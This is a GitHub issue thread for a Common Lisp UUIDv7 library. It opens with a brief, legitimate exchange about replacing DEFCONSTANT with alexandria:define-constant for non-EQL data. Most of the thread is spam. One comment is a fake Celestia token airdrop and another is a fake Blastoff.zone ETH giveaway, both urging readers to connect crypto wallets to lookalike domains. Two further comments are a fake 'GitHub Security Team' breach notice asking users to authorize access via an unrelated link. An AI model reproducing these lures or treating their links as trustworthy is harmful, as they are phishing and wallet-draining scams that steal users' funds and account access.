### ISSUE TITLE
DEFCONSTANT on non-EQL data

### ISSUE THREAD

**Issue by phoe** [pocaeus/uuidv7.lisp#5]
https://github.com/pseudomata/uuidv7.lisp/blob/34c0981d49566adf2a725e31f9c53927e47889cd/src/uuidv7.lisp#L60C1-L61

Use `alexandria:define-constant` with `:test #'equal` instead.

**Comment by pseudomata** [comment]
Thank you for the suggestion, @phoe! I made that change and will test it shortly before merging.

**Comment by andrewluetgers** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!NorianGuernine, @howdymary, @mariogogo1, @sxmixklink, @massun-onibakuchi, @cryptodyor01, @TejinderBreadMan, @arizonluk, @pelakee13, @MatthieuScarset, @booboomy97, @ronindokko, @anonwasm-WIN10-FF, @thuytranpharm, @NeuroNaught, @FthOgn, @MisterX346, @Luxxxol, @gothelpmasuflatxk, @bleudy

**Comment by jddunn** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
aexomainnet, @EgorEfremoff, @Bastiartworks, @goodbye92, @bakgwei, @gakonst, @nitantchhajed, @ohhkaneda, @michalsidzej, @stephen-eades, @dewrin, @ifunjoke, @ivandragoni, @Micro-SD, @accavdar, @YourDruzhe, @BeautifulVoid, @cryptbest, @shiordao, @Maxim20-21

**Comment by jddunn** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
1doce8, @eaddaa, @tonystark1722, @duxin0817060114, @ErikbStorm, @avrory, @0xcrust, @snormore, @raindust, @Thekayz, @xiaowanping2022, @ionandrei44, @crptnwb, @itachhiis, @ethnyc, @whatisaghostwriter, @Franceshe, @MaaRiisd, @AlexCryptoBear, @BenedettiLucca

**Comment by cmurav** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
